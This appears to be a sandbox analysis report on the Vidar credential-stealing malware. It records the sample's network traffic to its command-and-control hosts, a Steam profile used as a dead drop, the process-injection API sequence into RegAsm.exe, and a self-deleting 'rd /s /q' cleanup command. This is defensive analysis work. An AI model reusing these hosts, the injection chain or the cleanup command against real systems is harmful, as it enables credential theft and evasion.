2024-09-20 09:08:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49774	188.114.96.3	443	8184	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:08:10 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: quotamkdsdqo.shop
2024-09-20 09:08:10 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-20 09:08:11 UTC	776	IN	HTTP/1.1 200 OK Date: Fri, 20 Sep 2024 09:08:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8h2469cbq4vfn3cia8kb84rjk0; expires=Tue, 14 Jan 2025 02:54:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BQ86fJdtPPNPVzMc%2FlfcILfTo0si5FtV4PfGGFxEbewEuJbUv5x%2B%2BsbtgQYc6gYstHcAAuG8VZy53l7riZzokvZktAoPVs3C%2BpwXXIBPr3vedp8sUxqvSNQkUk1ez9rBOQ27jA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c60ab5fba81236a-EWR
2024-09-20 09:08:11 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-20 09:08:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49775	172.67.192.105	443	8184	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:08:11 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: carrtychaintnyw.shop
2024-09-20 09:08:11 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-20 09:08:12 UTC	782	IN	HTTP/1.1 200 OK Date: Fri, 20 Sep 2024 09:08:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=27mg4see617eh2oq1hkn3tl886; expires=Tue, 14 Jan 2025 02:54:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RwHPGSmwR9L%2BJBgDLNR4sWNhzAH%2B73J11qCxK6jQzb2qc2%2FnVJr2IWZX35gZV4JJDXoaPgo3ruOHsKKAfpBiBTSpQXk2TluE%2F5UaSx3oJrvCHIdcPRFL91Nq%2F2wm3AOLnJ0jUfWVQw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c60ab656f7d43b9-EWR
2024-09-20 09:08:12 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-20 09:08:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49776	23.192.247.89	443	8184	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:08:12 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-20 09:08:13 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 20 Sep 2024 09:08:13 GMT Content-Length: 34678 Connection: close Set-Cookie: sessionid=0b5e24a1cfad6840766925b1; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-20 09:08:13 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-20 09:08:13 UTC	10062	IN	Data Raw: 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f Data Ascii: ss': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_actio
2024-09-20 09:08:13 UTC	10102	IN	Data Raw: 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 Data Ascii: t;,"COMMUNITY_CDN_ASSET_URL":"https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/","STORE_CDN_URL":"https:\/\/store.akamai.steamstatic.com\/","PUBLIC_SHARED_URL":"https:\/\/communit

Target ID:	0
Start time:	05:06:58
Start date:	20/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x4d0000
File size:	411'512 bytes
MD5 hash:	6B082832F014548BF1703DDAED1E16B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1717289936.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1717289936.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:06:58
Start date:	20/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:06:59
Start date:	20/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x110000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:06:59
Start date:	20/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xd80000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:08:00
Start date:	20/09/2024
Path:	C:\ProgramData\BAAEHDBFID.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\BAAEHDBFID.exe"
Imagebase:	0xd80000
File size:	363'424 bytes
MD5 hash:	384A847AD2833788FA253433FD2EEA8D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:08:00
Start date:	20/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:08:02
Start date:	20/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xda0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:08:06
Start date:	20/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\HDAFIIDAKJDG" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:08:06
Start date:	20/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:08:07
Start date:	20/09/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x230000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	95.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	8
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02A0212D Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A0209F,02A0208F), ref: 02A0229C
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02A022AF
Wow64GetThreadContext.KERNEL32(000003BC,00000000), ref: 02A022CD
ReadProcessMemory.KERNELBASE(000003C0,?,02A020E3,00000004,00000000), ref: 02A022F1
VirtualAllocEx.KERNELBASE(000003C0,?,?,00003000,00000040), ref: 02A0231C
TerminateProcess.KERNELBASE(000003C0,00000000), ref: 02A0233B
WriteProcessMemory.KERNELBASE(000003C0,00000000,?,?,00000000,?), ref: 02A02374
WriteProcessMemory.KERNELBASE(000003C0,00400000,?,?,00000000,?,00000028), ref: 02A023BF
WriteProcessMemory.KERNELBASE(000003C0,-00000008,?,00000004,00000000), ref: 02A023FD
Wow64SetThreadContext.KERNEL32(000003BC,02850000), ref: 02A02439
ResumeThread.KERNELBASE(000003BC), ref: 02A02448

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 02A0229B
GetThreadContext, xrefs: 02A02207
TerminateProcess, xrefs: 02A0232B
SetThreadContext, xrefs: 02A02253
VirtualAllocEx, xrefs: 02A0222D
ress, xrefs: 02A021B7
VirtualAlloc, xrefs: 02A021F4
ReadProcessMemory, xrefs: 02A0221A
ResumeThread, xrefs: 02A02269
CreateProcessA, xrefs: 02A021E1
Load, xrefs: 02A0216B
GetP, xrefs: 02A021AF
WriteProcessMemory, xrefs: 02A02240
aryA, xrefs: 02A02173

Memory Dump Source

Source File: 00000000.00000002.1715232127.0000000002A01000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a01000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 3f51da5120e885674c8154e334fd9d49ae127aee9964e28eaf2dc2891a327acd
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: EBB1E57664028AAFDB60CF68CC80BDA77A5FF88714F158564EA0CAB341D774FA418B94

Analysis Process: RegAsm.exePID: 7516, Parent PID: 7412COMMON

Execution Graph

Execution Coverage:	7.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	22

Executed Functions

Function 004188A9 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00417223), ref: 004188BD
GetProcAddress.KERNEL32 ref: 004188D4
GetProcAddress.KERNEL32 ref: 004188EB
GetProcAddress.KERNEL32 ref: 00418902
GetProcAddress.KERNEL32 ref: 00418919
GetProcAddress.KERNEL32 ref: 00418930
GetProcAddress.KERNEL32 ref: 00418947
GetProcAddress.KERNEL32 ref: 0041895E
GetProcAddress.KERNEL32 ref: 00418975
GetProcAddress.KERNEL32 ref: 0041898C
GetProcAddress.KERNEL32 ref: 004189A3
GetProcAddress.KERNEL32 ref: 004189BA
GetProcAddress.KERNEL32 ref: 004189D1
GetProcAddress.KERNEL32 ref: 004189E8
GetProcAddress.KERNEL32 ref: 004189FF
GetProcAddress.KERNEL32 ref: 00418A16
GetProcAddress.KERNEL32 ref: 00418A2D
GetProcAddress.KERNEL32 ref: 00418A44
GetProcAddress.KERNEL32 ref: 00418A5B
GetProcAddress.KERNEL32 ref: 00418A72
GetProcAddress.KERNEL32 ref: 00418A89
GetProcAddress.KERNEL32 ref: 00418AA0
GetProcAddress.KERNEL32 ref: 00418AB7
GetProcAddress.KERNEL32 ref: 00418ACE
GetProcAddress.KERNEL32 ref: 00418AE5
GetProcAddress.KERNEL32 ref: 00418AFC
GetProcAddress.KERNEL32 ref: 00418B13
GetProcAddress.KERNEL32 ref: 00418B2A
GetProcAddress.KERNEL32 ref: 00418B41
GetProcAddress.KERNEL32 ref: 00418B58
GetProcAddress.KERNEL32 ref: 00418B6F
GetProcAddress.KERNEL32 ref: 00418B86
GetProcAddress.KERNEL32 ref: 00418B9D
GetProcAddress.KERNEL32 ref: 00418BB4
GetProcAddress.KERNEL32 ref: 00418BCB
GetProcAddress.KERNEL32 ref: 00418BE2
GetProcAddress.KERNEL32 ref: 00418BF9
GetProcAddress.KERNEL32 ref: 00418C10
GetProcAddress.KERNEL32 ref: 00418C27
GetProcAddress.KERNEL32 ref: 00418C3E
GetProcAddress.KERNEL32 ref: 00418C55
GetProcAddress.KERNEL32 ref: 00418C6C
GetProcAddress.KERNEL32 ref: 00418C83
GetProcAddress.KERNEL32(CreateProcessA), ref: 00418C99
GetProcAddress.KERNEL32(GetThreadContext), ref: 00418CAF
GetProcAddress.KERNEL32(ReadProcessMemory), ref: 00418CC5
GetProcAddress.KERNEL32(VirtualAllocEx), ref: 00418CDB
GetProcAddress.KERNEL32(ResumeThread), ref: 00418CF1
GetProcAddress.KERNEL32(WriteProcessMemory), ref: 00418D07
GetProcAddress.KERNEL32(SetThreadContext), ref: 00418D1D
LoadLibraryA.KERNEL32(00417223), ref: 00418D2E
LoadLibraryA.KERNEL32 ref: 00418D3F
LoadLibraryA.KERNEL32 ref: 00418D50
LoadLibraryA.KERNEL32 ref: 00418D61
LoadLibraryA.KERNEL32 ref: 00418D72
LoadLibraryA.KERNEL32 ref: 00418D83
LoadLibraryA.KERNEL32 ref: 00418D94
LoadLibraryA.KERNEL32 ref: 00418DA5
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418DB5
GetProcAddress.KERNEL32(75290000), ref: 00418DD0
GetProcAddress.KERNEL32 ref: 00418DE7
GetProcAddress.KERNEL32 ref: 00418DFE
GetProcAddress.KERNEL32 ref: 00418E15
GetProcAddress.KERNEL32 ref: 00418E2C
GetProcAddress.KERNEL32(73B40000), ref: 00418E4B
GetProcAddress.KERNEL32 ref: 00418E62
GetProcAddress.KERNEL32 ref: 00418E79
GetProcAddress.KERNEL32 ref: 00418E90
GetProcAddress.KERNEL32 ref: 00418EA7
GetProcAddress.KERNEL32 ref: 00418EBE
GetProcAddress.KERNEL32 ref: 00418ED5
GetProcAddress.KERNEL32 ref: 00418EEC
GetProcAddress.KERNEL32(752C0000), ref: 00418F07
GetProcAddress.KERNEL32 ref: 00418F1E
GetProcAddress.KERNEL32 ref: 00418F35
GetProcAddress.KERNEL32 ref: 00418F4C
GetProcAddress.KERNEL32 ref: 00418F63
GetProcAddress.KERNEL32(74EC0000), ref: 00418F82
GetProcAddress.KERNEL32 ref: 00418F99
GetProcAddress.KERNEL32 ref: 00418FB0
GetProcAddress.KERNEL32 ref: 00418FC7
GetProcAddress.KERNEL32 ref: 00418FDE
GetProcAddress.KERNEL32 ref: 00418FF5
GetProcAddress.KERNEL32(75BD0000), ref: 00419014
GetProcAddress.KERNEL32 ref: 0041902B
GetProcAddress.KERNEL32 ref: 00419042
GetProcAddress.KERNEL32 ref: 00419059
GetProcAddress.KERNEL32 ref: 00419070
GetProcAddress.KERNEL32 ref: 00419087
GetProcAddress.KERNEL32 ref: 0041909E
GetProcAddress.KERNEL32 ref: 004190B5
GetProcAddress.KERNEL32 ref: 004190CC
GetProcAddress.KERNEL32(75A70000), ref: 004190E7
GetProcAddress.KERNEL32 ref: 004190FE
GetProcAddress.KERNEL32 ref: 00419115
GetProcAddress.KERNEL32 ref: 0041912C
GetProcAddress.KERNEL32 ref: 00419143
GetProcAddress.KERNEL32(75450000), ref: 0041915E
GetProcAddress.KERNEL32 ref: 00419175
GetProcAddress.KERNEL32(75DA0000), ref: 00419190
GetProcAddress.KERNEL32 ref: 004191A7
GetProcAddress.KERNEL32(6F090000), ref: 004191C6
GetProcAddress.KERNEL32 ref: 004191DD
GetProcAddress.KERNEL32 ref: 004191F4
GetProcAddress.KERNEL32 ref: 0041920B
GetProcAddress.KERNEL32 ref: 00419222
GetProcAddress.KERNEL32 ref: 00419239
GetProcAddress.KERNEL32 ref: 00419250
GetProcAddress.KERNEL32 ref: 00419267
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 0041927D
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 00419293
GetProcAddress.KERNEL32(75AF0000), ref: 004192AE
GetProcAddress.KERNEL32 ref: 004192C5
GetProcAddress.KERNEL32 ref: 004192DC
GetProcAddress.KERNEL32 ref: 004192F3
GetProcAddress.KERNEL32(75D90000), ref: 0041930E
GetProcAddress.KERNEL32(6C540000), ref: 00419329
GetProcAddress.KERNEL32 ref: 00419340
GetProcAddress.KERNEL32 ref: 00419357
GetProcAddress.KERNEL32 ref: 0041936E
GetProcAddress.KERNEL32(6C350000,SymMatchString), ref: 00419388

Strings

ResumeThread, xrefs: 00418CE1
SetThreadContext, xrefs: 00418D0D
GetThreadContext, xrefs: 00418C9F
InternetSetOptionA, xrefs: 00419283
dbghelp.dll, xrefs: 00418DAB
CreateProcessA, xrefs: 00418C89
WriteProcessMemory, xrefs: 00418CF7
HttpQueryInfoA, xrefs: 0041926D
SymMatchString, xrefs: 00419382
VirtualAllocEx, xrefs: 00418CCB
ReadProcessMemory, xrefs: 00418CB5

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 2238633743-2740034357
Opcode ID: 001e43a0b489369dce9f92bfbd7b33de1f4b787a34060d296b7896c1e8d3ad5e
Instruction ID: ed02fcc459f3604369067173ee653485ca2bf246820acbf48ee5e73b4844ca9c
Opcode Fuzzy Hash: 001e43a0b489369dce9f92bfbd7b33de1f4b787a34060d296b7896c1e8d3ad5e
Instruction Fuzzy Hash: B452DB75915302AFDB22DF60FD4A9253BB7F728307B21A125E902DA6F0D7B24860EF15

Function 00414C20 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 297
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414C74
FindFirstFileA.KERNEL32(?,?), ref: 00414C8B
_memset.LIBCMT ref: 00414CA7
_memset.LIBCMT ref: 00414CB8
StrCmpCA.SHLWAPI(?,004369EC), ref: 00414CD9
StrCmpCA.SHLWAPI(?,004369F0), ref: 00414CF3
wsprintfA.USER32 ref: 00414D1A
StrCmpCA.SHLWAPI(?,0043660F), ref: 00414D2E
wsprintfA.USER32 ref: 00414D57
wsprintfA.USER32 ref: 00414D6E

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

